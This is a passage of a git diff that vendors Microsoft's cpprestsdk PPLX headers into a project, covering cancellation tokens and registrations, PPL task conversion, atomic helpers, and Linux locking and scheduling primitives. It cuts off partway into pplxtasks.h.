pRegistration; + } + + void _RegisterCallback(_In_ _CancellationTokenRegistration* _PRegistration) + { + _PRegistration->_M_state = _CancellationTokenRegistration::_STATE_CLEAR; + _PRegistration->_Reference(); + _PRegistration->_M_pTokenState = this; + + bool invoke = true; + + if (!_IsCanceled()) + { + extensibility::scoped_critical_section_t _Lock(_M_listLock); + + if (!_IsCanceled()) + { + invoke = false; + _M_registrations.push_back(_PRegistration); + } + } + + if (invoke) + { + _PRegistration->_Invoke(); + } + } + + void _DeregisterCallback(_In_ _CancellationTokenRegistration* _PRegistration) + { + bool synchronize = false; + + { + extensibility::scoped_critical_section_t _Lock(_M_listLock); + + // + // If a cancellation has occurred, the registration list is guaranteed to be empty if we've observed it + // under the auspices of the lock. In this case, we must synchronize with the canceling thread to guarantee + // that the cancellation is finished by the time we return from this method. + // + if (!_M_registrations.empty()) + { + _M_registrations.remove(_PRegistration); + _PRegistration->_M_state = _CancellationTokenRegistration::_STATE_SYNCHRONIZE; + _PRegistration->_Release(); + } + else + { + synchronize = true; + } + } + + // + // If the list is empty, we are in one of several situations: + // + // - The callback has already been made --> do nothing + // - The callback is about to be made --> flag it so it doesn't happen and return + // - The callback is in progress elsewhere --> synchronize with it + // - The callback is in progress on this thread --> do nothing + // + if (synchronize) + { + long result = atomic_compare_exchange(_PRegistration->_M_state, + _CancellationTokenRegistration::_STATE_DEFER_DELETE, + _CancellationTokenRegistration::_STATE_CLEAR); + + switch (result) + { + case _CancellationTokenRegistration::_STATE_CLEAR: + case _CancellationTokenRegistration::_STATE_CALLED: break; + case _CancellationTokenRegistration::_STATE_DEFER_DELETE: + case _CancellationTokenRegistration::_STATE_SYNCHRONIZE: _ASSERTE(false); break; + default: + { + long tid = result; + if (tid == ::pplx::details::platform::GetCurrentThreadId()) + { + // + // It is entirely legal for a caller to Deregister during a callback instead of having to + // provide their own synchronization mechanism between the two. In this case, we do *NOT* need + // to explicitly synchronize with the callback as doing so would deadlock. If the call happens + // during, skip any extra synchronization. + // + break; + } + + extensibility::event_t ev; + _PRegistration->_M_pSyncBlock = &ev; + + long result_1 = + atomic_exchange(_PRegistration->_M_state, _CancellationTokenRegistration::_STATE_SYNCHRONIZE); + + if (result_1 != _CancellationTokenRegistration::_STATE_CALLED) + { + _PRegistration->_M_pSyncBlock->wait(::pplx::extensibility::event_t::timeout_infinite); + } + + break; + } + } + } + } + +private: + // The flag for the token state (whether it is canceled or not) + atomic_long _M_stateFlag; + + // Notification of completion of cancellation of this token. + extensibility::event_t _M_cancelComplete; // Hmm.. where do we wait for it?? + + // Lock to protect the registrations list + extensibility::critical_section_t _M_listLock; + + // The protected list of registrations + TokenRegistrationContainer _M_registrations; +}; + +} // namespace details + +class cancellation_token_source; +class cancellation_token; + +/// +/// The cancellation_token_registration class represents a callback notification from a +/// cancellation_token. When the register method on a cancellation_token is used to receive +/// notification of when cancellation occurs, a cancellation_token_registration object is returned as a +/// handle to the callback so that the caller can request a specific callback no longer be made through use of the +/// deregister method. +/// +class cancellation_token_registration +{ +public: + cancellation_token_registration() : _M_pRegistration(NULL) {} + + ~cancellation_token_registration() { _Clear(); } + + cancellation_token_registration(const cancellation_token_registration& _Src) { _Assign(_Src._M_pRegistration); } + + cancellation_token_registration(cancellation_token_registration&& _Src) { _Move(_Src._M_pRegistration); } + + cancellation_token_registration& operator=(const cancellation_token_registration& _Src) + { + if (this != &_Src) + { + _Clear(); + _Assign(_Src._M_pRegistration); + } + return *this; + } + + cancellation_token_registration& operator=(cancellation_token_registration&& _Src) + { + if (this != &_Src) + { + _Clear(); + _Move(_Src._M_pRegistration); + } + return *this; + } + + bool operator==(const cancellation_token_registration& _Rhs) const + { + return _M_pRegistration == _Rhs._M_pRegistration; + } + + bool operator!=(const cancellation_token_registration& _Rhs) const { return !(operator==(_Rhs)); } + +private: + friend class cancellation_token; + + cancellation_token_registration(_In_ details::_CancellationTokenRegistration* _PRegistration) + : _M_pRegistration(_PRegistration) + { + } + + void _Clear() + { + if (_M_pRegistration != NULL) + { + _M_pRegistration->_Release(); + } + _M_pRegistration = NULL; + } + + void _Assign(_In_ details::_CancellationTokenRegistration* _PRegistration) + { + if (_PRegistration != NULL) + { + _PRegistration->_Reference(); + } + _M_pRegistration = _PRegistration; + } + + void _Move(_In_ details::_CancellationTokenRegistration*& _PRegistration) + { + _M_pRegistration = _PRegistration; + _PRegistration = NULL; + } + + details::_CancellationTokenRegistration* _M_pRegistration; +}; + +/// +/// The cancellation_token class represents the ability to determine whether some operation has been +/// requested to cancel. A given token can be associated with a task_group, structured_task_group, or +/// task to provide implicit cancellation. It can also be polled for cancellation or have a callback +/// registered for if and when the associated cancellation_token_source is canceled. +/// +class cancellation_token +{ +public: + typedef details::_CancellationTokenState* _ImplType; + + /// + /// Returns a cancellation token which can never be subject to cancellation. + /// + /// + /// A cancellation token that cannot be canceled. + /// + static cancellation_token none() { return cancellation_token(); } + + cancellation_token(const cancellation_token& _Src) { _Assign(_Src._M_Impl); } + + cancellation_token(cancellation_token&& _Src) { _Move(_Src._M_Impl); } + + cancellation_token& operator=(const cancellation_token& _Src) + { + if (this != &_Src) + { + _Clear(); + _Assign(_Src._M_Impl); + } + return *this; + } + + cancellation_token& operator=(cancellation_token&& _Src) + { + if (this != &_Src) + { + _Clear(); + _Move(_Src._M_Impl); + } + return *this; + } + + bool operator==(const cancellation_token& _Src) const { return _M_Impl == _Src._M_Impl; } + + bool operator!=(const cancellation_token& _Src) const { return !(operator==(_Src)); } + + ~cancellation_token() { _Clear(); } + + /// + /// Returns an indication of whether this token can be canceled or not. + /// + /// + /// An indication of whether this token can be canceled or not. + /// + bool is_cancelable() const { return (_M_Impl != NULL); } + + /// + /// Returns true if the token has been canceled. + /// + /// + /// The value true if the token has been canceled; otherwise, the value false. + /// + bool is_canceled() const { return (_M_Impl != NULL && _M_Impl->_IsCanceled()); } + + /// + /// Registers a callback function with the token. If and when the token is canceled, the callback will be made. + /// Note that if the token is already canceled at the point where this method is called, the callback will be + /// made immediately and synchronously. + /// + /// + /// The type of the function object that will be called back when this cancellation_token is canceled. + /// + /// + /// The function object that will be called back when this cancellation_token is canceled. + /// + /// + /// A cancellation_token_registration object which can be utilized in the deregister method to + /// deregister a previously registered callback and prevent it from being made. The method will throw an invalid_operation exception if it is called on a + /// cancellation_token object that was created using the cancellation_token::none method. + /// + template + ::pplx::cancellation_token_registration register_callback(const _Function& _Func) const + { + if (_M_Impl == NULL) + { + // A callback cannot be registered if the token does not have an associated source. + throw invalid_operation(); + } +#if defined(_MSC_VER) +#pragma warning(suppress : 28197) +#endif + details::_CancellationTokenCallback<_Function>* _PCallback = + new details::_CancellationTokenCallback<_Function>(_Func); + _M_Impl->_RegisterCallback(_PCallback); + return cancellation_token_registration(_PCallback); + } + + /// + /// Removes a callback previously registered via the register method based on the + /// cancellation_token_registration object returned at the time of registration. + /// + /// + /// The cancellation_token_registration object corresponding to the callback to be deregistered. This + /// token must have been previously returned from a call to the register method. + /// + void deregister_callback(const cancellation_token_registration& _Registration) const + { + _M_Impl->_DeregisterCallback(_Registration._M_pRegistration); + } + + _ImplType _GetImpl() const { return _M_Impl; } + + _ImplType _GetImplValue() const + { + return (_M_Impl == NULL) ? ::pplx::details::_CancellationTokenState::_None() : _M_Impl; + } + + static cancellation_token _FromImpl(_ImplType _Impl) { return cancellation_token(_Impl); } + +private: + friend class cancellation_token_source; + + _ImplType _M_Impl; + + void _Clear() + { + if (_M_Impl != NULL) + { + _M_Impl->_Release(); + } + _M_Impl = NULL; + } + + void _Assign(_ImplType _Impl) + { + if (_Impl != NULL) + { + _Impl->_Reference(); + } + _M_Impl = _Impl; + } + + void _Move(_ImplType& _Impl) + { + _M_Impl = _Impl; + _Impl = NULL; + } + + cancellation_token() : _M_Impl(NULL) {} + + cancellation_token(_ImplType _Impl) : _M_Impl(_Impl) + { + if (_M_Impl == ::pplx::details::_CancellationTokenState::_None()) + { + _M_Impl = NULL; + } + + if (_M_Impl != NULL) + { + _M_Impl->_Reference(); + } + } +}; + +/// +/// The cancellation_token_source class represents the ability to cancel some cancelable operation. +/// +class cancellation_token_source +{ +public: + typedef ::pplx::details::_CancellationTokenState* _ImplType; + + /// + /// Constructs a new cancellation_token_source. The source can be used to flag cancellation of some + /// cancelable operation. + /// + cancellation_token_source() { _M_Impl = new ::pplx::details::_CancellationTokenState; } + + cancellation_token_source(const cancellation_token_source& _Src) { _Assign(_Src._M_Impl); } + + cancellation_token_source(cancellation_token_source&& _Src) { _Move(_Src._M_Impl); } + + cancellation_token_source& operator=(const cancellation_token_source& _Src) + { + if (this != &_Src) + { + _Clear(); + _Assign(_Src._M_Impl); + } + return *this; + } + + cancellation_token_source& operator=(cancellation_token_source&& _Src) + { + if (this != &_Src) + { + _Clear(); + _Move(_Src._M_Impl); + } + return *this; + } + + bool operator==(const cancellation_token_source& _Src) const { return _M_Impl == _Src._M_Impl; } + + bool operator!=(const cancellation_token_source& _Src) const { return !(operator==(_Src)); } + + ~cancellation_token_source() + { + if (_M_Impl != NULL) + { + _M_Impl->_Release(); + } + } + + /// + /// Returns a cancellation token associated with this source. The returned token can be polled for cancellation + /// or provide a callback if and when cancellation occurs. + /// + /// + /// A cancellation token associated with this source. + /// + cancellation_token get_token() const { return cancellation_token(_M_Impl); } + + /// + /// Creates a cancellation_token_source which is canceled when the provided token is canceled. + /// + /// + /// A token whose cancellation will cause cancellation of the returned token source. Note that the returned + /// token source can also be canceled independently of the source contained in this parameter. + /// + /// + /// A cancellation_token_source which is canceled when the token provided by the + /// parameter is canceled. + /// + static cancellation_token_source create_linked_source(cancellation_token& _Src) + { + cancellation_token_source newSource; + _Src.register_callback([newSource]() { newSource.cancel(); }); + return newSource; + } + + /// + /// Creates a cancellation_token_source which is canceled when one of a series of tokens represented by + /// an STL iterator pair is canceled. + /// + /// + /// The STL iterator corresponding to the beginning of the range of tokens to listen for cancellation of. + /// + /// + /// The STL iterator corresponding to the ending of the range of tokens to listen for cancellation of. + /// + /// + /// A cancellation_token_source which is canceled when any of the tokens provided by the range described + /// by the STL iterators contained in the and parameters is + /// canceled. + /// + template + static cancellation_token_source create_linked_source(_Iter _Begin, _Iter _End) + { + cancellation_token_source newSource; + for (_Iter _It = _Begin; _It != _End; ++_It) + { + _It->register_callback([newSource]() { newSource.cancel(); }); + } + return newSource; + } + + /// + /// Cancels the token. Any task_group, structured_task_group, or task which utilizes the + /// token will be canceled upon this call and throw an exception at the next interruption point. + /// + void cancel() const { _M_Impl->_Cancel(); } + + _ImplType _GetImpl() const { return _M_Impl; } + + static cancellation_token_source _FromImpl(_ImplType _Impl) { return cancellation_token_source(_Impl); } + +private: + _ImplType _M_Impl; + + void _Clear() + { + if (_M_Impl != NULL) + { + _M_Impl->_Release(); + } + _M_Impl = NULL; + } + + void _Assign(_ImplType _Impl) + { + if (_Impl != NULL) + { + _Impl->_Reference(); + } + _M_Impl = _Impl; + } + + void _Move(_ImplType& _Impl) + { + _M_Impl = _Impl; + _Impl = NULL; + } + + cancellation_token_source(_ImplType _Impl) : _M_Impl(_Impl) + { + if (_M_Impl == ::pplx::details::_CancellationTokenState::_None()) + { + _M_Impl = NULL; + } + + if (_M_Impl != NULL) + { + _M_Impl->_Reference(); + } + } +}; + +} // namespace pplx + +#pragma pop_macro("new") +#pragma pack(pop) + +#endif // _PPLXCANCELLATION_TOKEN_H diff --git a/Src/Common/CppRestSdk/include/pplx/pplxconv.h b/Src/Common/CppRestSdk/include/pplx/pplxconv.h new file mode 100644 index 0000000..ee50843 --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplxconv.h @@ -0,0 +1,83 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Utilities to convert between PPL tasks and PPLX tasks + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#ifndef _PPLXCONV_H +#define _PPLXCONV_H + +#ifndef _WIN32 +#error This is only supported on Windows +#endif + +#if defined(_MSC_VER) && (_MSC_VER >= 1700) && (_MSC_VER < 1800) && !CPPREST_FORCE_PPLX + +#include "Common/CppRestSdk/include/pplx/pplxtasks.h" +#include + +namespace pplx +{ +namespace _Ppl_conv_helpers +{ +template +auto _Set_value(_Tc _Tcp, const _F& _Func) -> decltype(_Tcp.set(_Func())) +{ + return _Tcp.set(_Func()); +} + +template +auto _Set_value(_Tc _Tcp, const _F& _Func, ...) -> decltype(_Tcp.set()) +{ + _Func(); + return _Tcp.set(); +} + +template +_OtherTaskType _Convert_task(_TaskType _Task) +{ + _OtherTCEType _Tc; + _Task.then([_Tc](_TaskType _Task2) { + try + { + _Ppl_conv_helpers::_Set_value(_Tc, [=] { return _Task2.get(); }); + } + catch (...) + { + _Tc.set_exception(std::current_exception()); + } + }); + _OtherTaskType _T_other(_Tc); + return _T_other; +} +} // namespace _Ppl_conv_helpers + +template +concurrency::task<_TaskType> pplx_task_to_concurrency_task(pplx::task<_TaskType> _Task) +{ + return _Ppl_conv_helpers::_Convert_task, + concurrency::task<_TaskType>, + concurrency::task_completion_event<_TaskType>>(_Task); +} + +template +pplx::task<_TaskType> concurrency_task_to_pplx_task(concurrency::task<_TaskType> _Task) +{ + return _Ppl_conv_helpers::_Convert_task, + pplx::task<_TaskType>, + pplx::task_completion_event<_TaskType>>(_Task); +} +} // namespace pplx + +#endif + +#endif // _PPLXCONV_H diff --git a/Src/Common/CppRestSdk/include/pplx/pplxinterface.h b/Src/Common/CppRestSdk/include/pplx/pplxinterface.h new file mode 100644 index 0000000..4e5ca5b --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplxinterface.h @@ -0,0 +1,227 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * PPL interfaces + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#ifndef _PPLXINTERFACE_H +#define _PPLXINTERFACE_H + +#if (defined(_MSC_VER) && (_MSC_VER >= 1800)) && !CPPREST_FORCE_PPLX +#error This file must not be included for Visual Studio 12 or later +#endif + +#if defined(_CRTBLD) +#elif defined(_WIN32) +#if (_MSC_VER >= 1700) +#define _USE_REAL_ATOMICS +#endif +#else // GCC compiler +#define _USE_REAL_ATOMICS +#endif + +#include +#ifdef _USE_REAL_ATOMICS +#include +#endif + +#define _pplx_cdecl __cdecl + +namespace pplx +{ +/// +/// An elementary abstraction for a task, defined as void (__cdecl * TaskProc_t)(void *). A TaskProc +/// is called to invoke the body of a task. +/// +/**/ +typedef void(_pplx_cdecl* TaskProc_t)(void*); + +/// +/// Scheduler Interface +/// +struct __declspec(novtable) scheduler_interface +{ + virtual void schedule(TaskProc_t, _In_ void*) = 0; +}; + +/// +/// Represents a pointer to a scheduler. This class exists to allow the +/// the specification of a shared lifetime by using shared_ptr or just +/// a plain reference by using raw pointer. +/// +struct scheduler_ptr +{ + /// + /// Creates a scheduler pointer from shared_ptr to scheduler + /// + explicit scheduler_ptr(std::shared_ptr scheduler) : m_sharedScheduler(std::move(scheduler)) + { + m_scheduler = m_sharedScheduler.get(); + } + + /// + /// Creates a scheduler pointer from raw pointer to scheduler + /// + explicit scheduler_ptr(_In_opt_ scheduler_interface* pScheduler) : m_scheduler(pScheduler) {} + + /// + /// Behave like a pointer + /// + scheduler_interface* operator->() const { return get(); } + + /// + /// Returns the raw pointer to the scheduler + /// + scheduler_interface* get() const { return m_scheduler; } + + /// + /// Test whether the scheduler pointer is non-null + /// + operator bool() const { return get() != nullptr; } + +private: + std::shared_ptr m_sharedScheduler; + scheduler_interface* m_scheduler; +}; + +/// +/// Describes the execution status of a task_group or structured_task_group object. A value of this +/// type is returned by numerous methods that wait on tasks scheduled to a task group to complete. +/// +/// +/// +/// +/// +/// +/// +/**/ +enum task_group_status +{ + /// + /// The tasks queued to the task_group object have not completed. Note that this value is not presently + /// returned by the Concurrency Runtime. + /// + /**/ + not_complete, + + /// + /// The tasks queued to the task_group or structured_task_group object completed successfully. + /// + /**/ + completed, + + /// + /// The task_group or structured_task_group object was canceled. One or more tasks may not have + /// executed. + /// + /**/ + canceled +}; + +namespace details +{ +/// +/// Atomics +/// +#ifdef _USE_REAL_ATOMICS +typedef std::atomic atomic_long; +typedef std::atomic atomic_size_t; + +template +_T atomic_compare_exchange(std::atomic<_T>& _Target, _T _Exchange, _T _Comparand) +{ + _T _Result = _Comparand; + _Target.compare_exchange_strong(_Result, _Exchange); + return _Result; +} + +template +_T atomic_exchange(std::atomic<_T>& _Target, _T _Value) +{ + return _Target.exchange(_Value); +} + +template +_T atomic_increment(std::atomic<_T>& _Target) +{ + return _Target.fetch_add(1) + 1; +} + +template +_T atomic_decrement(std::atomic<_T>& _Target) +{ + return _Target.fetch_sub(1) - 1; +} + +template +_T atomic_add(std::atomic<_T>& _Target, _T value) +{ + return _Target.fetch_add(value) + value; +} + +#else // not _USE_REAL_ATOMICS + +typedef long volatile atomic_long; +typedef size_t volatile atomic_size_t; + +template +inline T atomic_exchange(T volatile& _Target, T _Value) +{ + return _InterlockedExchange(&_Target, _Value); +} + +inline long atomic_increment(long volatile& _Target) { return _InterlockedIncrement(&_Target); } + +inline long atomic_add(long volatile& _Target, long value) { return _InterlockedExchangeAdd(&_Target, value) + value; } + +inline size_t atomic_increment(size_t volatile& _Target) +{ +#if (defined(_M_IX86) || defined(_M_ARM)) + return static_cast(_InterlockedIncrement(reinterpret_cast(&_Target))); +#else + return static_cast(_InterlockedIncrement64(reinterpret_cast<__int64 volatile*>(&_Target))); +#endif +} + +inline long atomic_decrement(long volatile& _Target) { return _InterlockedDecrement(&_Target); } + +inline size_t atomic_decrement(size_t volatile& _Target) +{ +#if (defined(_M_IX86) || defined(_M_ARM)) + return static_cast(_InterlockedDecrement(reinterpret_cast(&_Target))); +#else + return static_cast(_InterlockedDecrement64(reinterpret_cast<__int64 volatile*>(&_Target))); +#endif +} + +inline long atomic_compare_exchange(long volatile& _Target, long _Exchange, long _Comparand) +{ + return _InterlockedCompareExchange(&_Target, _Exchange, _Comparand); +} + +inline size_t atomic_compare_exchange(size_t volatile& _Target, size_t _Exchange, size_t _Comparand) +{ +#if (defined(_M_IX86) || defined(_M_ARM)) + return static_cast(_InterlockedCompareExchange( + reinterpret_cast(_Target), static_cast(_Exchange), static_cast(_Comparand))); +#else + return static_cast(_InterlockedCompareExchange64(reinterpret_cast<__int64 volatile*>(_Target), + static_cast<__int64>(_Exchange), + static_cast<__int64>(_Comparand))); +#endif +} +#endif // _USE_REAL_ATOMICS + +} // namespace details +} // namespace pplx + +#endif // _PPLXINTERFACE_H diff --git a/Src/Common/CppRestSdk/include/pplx/pplxlinux.h b/Src/Common/CppRestSdk/include/pplx/pplxlinux.h new file mode 100644 index 0000000..75e79d7 --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplxlinux.h @@ -0,0 +1,288 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Linux specific pplx implementations + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#if (defined(_MSC_VER)) +#error This file must not be included for Visual Studio +#endif + +#ifndef _WIN32 + +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" +#include "pthread.h" +#include + +#if defined(__APPLE__) +#include +#include +#include +#else +#include +#include +#include +#endif + +#include "Common/CppRestSdk/include/pplx/pplxinterface.h" + +namespace pplx +{ +#if defined(__APPLE__) +namespace cpprest_synchronization = ::boost; +#else +namespace cpprest_synchronization = ::std; +#endif +namespace details +{ +namespace platform +{ +/// +/// Returns a unique identifier for the execution thread where this routine in invoked +/// +_PPLXIMP long _pplx_cdecl GetCurrentThreadId(); + +/// +/// Yields the execution of the current execution thread - typically when spin-waiting +/// +_PPLXIMP void _pplx_cdecl YieldExecution(); + +/// +/// Captures the callstack +/// +__declspec(noinline) inline static size_t CaptureCallstack(void**, size_t, size_t) { return 0; } +} // namespace platform + +/// +/// Manual reset event +/// +class event_impl +{ +private: + cpprest_synchronization::mutex _lock; + cpprest_synchronization::condition_variable _condition; + bool _signaled; + +public: + static const unsigned int timeout_infinite = 0xFFFFFFFF; + + event_impl() : _signaled(false) {} + + void set() + { + cpprest_synchronization::lock_guard lock(_lock); + _signaled = true; + _condition.notify_all(); + } + + void reset() + { + cpprest_synchronization::lock_guard lock(_lock); + _signaled = false; + } + + unsigned int wait(unsigned int timeout) + { + cpprest_synchronization::unique_lock lock(_lock); + if (timeout == event_impl::timeout_infinite) + { + _condition.wait(lock, [this]() -> bool { return _signaled; }); + return 0; + } + else + { + cpprest_synchronization::chrono::milliseconds period(timeout); + auto status = _condition.wait_for(lock, period, [this]() -> bool { return _signaled; }); + _ASSERTE(status == _signaled); + // Return 0 if the wait completed as a result of signaling the event. Otherwise, return timeout_infinite + // Note: this must be consistent with the behavior of the Windows version, which is based on + // WaitForSingleObjectEx + return status ? 0 : event_impl::timeout_infinite; + } + } + + unsigned int wait() { return wait(event_impl::timeout_infinite); } +}; + +/// +/// Reader writer lock +/// +class reader_writer_lock_impl +{ +private: + pthread_rwlock_t _M_reader_writer_lock; + +public: + class scoped_lock_read + { + public: + explicit scoped_lock_read(reader_writer_lock_impl& _Reader_writer_lock) + : _M_reader_writer_lock(_Reader_writer_lock) + { + _M_reader_writer_lock.lock_read(); + } + + ~scoped_lock_read() { _M_reader_writer_lock.unlock(); } + + private: + reader_writer_lock_impl& _M_reader_writer_lock; + scoped_lock_read(const scoped_lock_read&); // no copy constructor + scoped_lock_read const& operator=(const scoped_lock_read&); // no assignment operator + }; + + reader_writer_lock_impl() { pthread_rwlock_init(&_M_reader_writer_lock, nullptr); } + + ~reader_writer_lock_impl() { pthread_rwlock_destroy(&_M_reader_writer_lock); } + + void lock() { pthread_rwlock_wrlock(&_M_reader_writer_lock); } + + void lock_read() { pthread_rwlock_rdlock(&_M_reader_writer_lock); } + + void unlock() { pthread_rwlock_unlock(&_M_reader_writer_lock); } +}; + +/// +/// Recursive mutex +/// +class recursive_lock_impl +{ +public: + recursive_lock_impl() : _M_owner(-1), _M_recursionCount(0) {} + + ~recursive_lock_impl() + { + _ASSERTE(_M_owner == -1); + _ASSERTE(_M_recursionCount == 0); + } + + void lock() + { + auto id = ::pplx::details::platform::GetCurrentThreadId(); + + if (_M_owner == id) + { + _M_recursionCount++; + } + else + { + _M_cs.lock(); + _M_owner = id; + _M_recursionCount = 1; + } + } + + void unlock() + { + _ASSERTE(_M_owner == ::pplx::details::platform::GetCurrentThreadId()); + _ASSERTE(_M_recursionCount >= 1); + + _M_recursionCount--; + + if (_M_recursionCount == 0) + { + _M_owner = -1; + _M_cs.unlock(); + } + } + +private: + cpprest_synchronization::mutex _M_cs; + std::atomic _M_owner; + long _M_recursionCount; +}; + +#if defined(__APPLE__) +class apple_scheduler : public pplx::scheduler_interface +#else +class linux_scheduler : public pplx::scheduler_interface +#endif +{ +public: + _PPLXIMP virtual void schedule(TaskProc_t proc, _In_ void* param); +#if defined(__APPLE__) + virtual ~apple_scheduler() {} +#else + virtual ~linux_scheduler() {} +#endif +}; + +} // namespace details + +/// +/// A generic RAII wrapper for locks that implements the critical_section interface +/// cpprest_synchronization::lock_guard +/// +template +class scoped_lock +{ +public: + explicit scoped_lock(_Lock& _Critical_section) : _M_critical_section(_Critical_section) + { + _M_critical_section.lock(); + } + + ~scoped_lock() { _M_critical_section.unlock(); } + +private: + _Lock& _M_critical_section; + + scoped_lock(const scoped_lock&); // no copy constructor + scoped_lock const& operator=(const scoped_lock&); // no assignment operator +}; + +// The extensibility namespace contains the type definitions that are used internally +namespace extensibility +{ +typedef ::pplx::details::event_impl event_t; + +typedef cpprest_synchronization::mutex critical_section_t; +typedef scoped_lock scoped_critical_section_t; + +typedef ::pplx::details::reader_writer_lock_impl reader_writer_lock_t; +typedef scoped_lock scoped_rw_lock_t; +typedef ::pplx::extensibility::reader_writer_lock_t::scoped_lock_read scoped_read_lock_t; + +typedef ::pplx::details::recursive_lock_impl recursive_lock_t; +typedef scoped_lock scoped_recursive_lock_t; +} // namespace extensibility + +/// +/// Default scheduler type +/// +#if defined(__APPLE__) +typedef details::apple_scheduler default_scheduler_t; +#else +typedef details::linux_scheduler default_scheduler_t; +#endif + +namespace details +{ +/// +/// Terminate the process due to unhandled exception +/// +#ifndef _REPORT_PPLTASK_UNOBSERVED_EXCEPTION +#define _REPORT_PPLTASK_UNOBSERVED_EXCEPTION() \ + do \ + { \ + raise(SIGTRAP); \ + std::terminate(); \ + } while (false) +#endif //_REPORT_PPLTASK_UNOBSERVED_EXCEPTION +} // namespace details + +// see: http://gcc.gnu.org/onlinedocs/gcc/Return-Address.html +// this is critical to inline +__attribute__((always_inline)) inline void* _ReturnAddress() { return __builtin_return_address(0); } + +} // namespace pplx + +#endif // !_WIN32 diff --git a/Src/Common/CppRestSdk/include/pplx/pplxtasks.h b/Src/Common/CppRestSdk/include/pplx/pplxtasks.h new file mode 100644 index 0000000..f2c3120 --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplxtasks.h @@ -0,0 +1,7600 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Parallel Patterns Library - PPLx Tasks + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#ifndef PPLXTASKS_H +#define PPLXTASKS_H + +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" + +#if (defined(_MSC_VER) && (_MSC_VER >= 1800)) && !CPPREST_FORCE_PPLX +#include +namespace pplx = Concurrency; + +namespace Concurrency +{ +/// +/// Sets the ambient scheduler to be used by the PPL constructs. +/// +_ASYNCRTIMP void __cdecl set_cpprestsdk_ambient_scheduler(const std::shared_ptr& _Scheduler); + +/// +/// Gets the ambient scheduler to be used by the PPL constructs +/// +_ASYNCRTIMP const std::shared_ptr& __cdecl get_cpprestsdk_ambient_scheduler(); + +} // namespace Concurrency + +#if (_MSC_VER >= 1900) +#include +namespace Concurrency +{ +namespace extensibility +{ +typedef ::std::condition_variable condition_variable_t; +typedef ::std::mutex critical_section_t; +typedef ::std::unique_lock<::std::mutex> scoped_critical_section_t; + +typedef ::Concurrency::event event_t; +typedef ::Concurrency::reader_writer_lock reader_writer_lock_t; +typedef ::Concurrency::reader_writer_lock::scoped_lock scoped_rw_lock_t; +typedef ::Concurrency::reader_writer_lock::scoped_lock_read scoped_read_lock_t; + +typedef ::Concurrency::details::_ReentrantBlockingLock recursive_lock_t; +typedef recursive_lock_t::_Scoped_lock scoped_recursive_lock_t; +} // namespace extensibility +} // namespace Concurrency +#endif // _MSC_VER >= 1900 +#else + +#include "Common/CppRestSdk/include/pplx/pplx.h" + +#if defined(__ANDROID__) +#include +void cpprest_init(JavaVM*); +#endif + +// Cannot build using a compiler that is older than dev10 SP1 +#if defined(_MSC_VER) +#if _MSC_FULL_VER < 160040219 /*IFSTRIP=IGN*/ +#error ERROR: Visual Studio 2010 SP1 or later is required to build ppltasks +#endif /*IFSTRIP=IGN*/ +#endif /* defined(_MSC_VER) */ + +#include +#include +#include +#include +#include +#include + +#if defined(_MSC_VER) +#include +#if defined(__cplusplus_winrt) +#include +#include +#include + +#include +#ifndef _UITHREADCTXT_SUPPORT + +#ifdef WINAPI_FAMILY /*IFSTRIP=IGN*/ + +// It is safe to include winapifamily as WINAPI_FAMILY was defined by the user +#include + +#if WINAPI_FAMILY == WINAPI_FAMILY_APP +// UI thread context support is not required for desktop and Windows Store apps +#define _UITHREADCTXT_SUPPORT 0 +#elif WINAPI_FAMILY == WINAPI_FAMILY_DESKTOP_APP +// UI thread context support is not required for desktop and Windows Store apps +#define _UITHREADCTXT_SUPPORT 0 +#else /* WINAPI_FAMILY == WINAPI_FAMILY_DESKTOP_APP */ +#define _UITHREADCTXT_SUPPORT 1 +#endif /* WINAPI_FAMILY == WINAPI_FAMILY_DESKTOP_APP */ + +#else /* 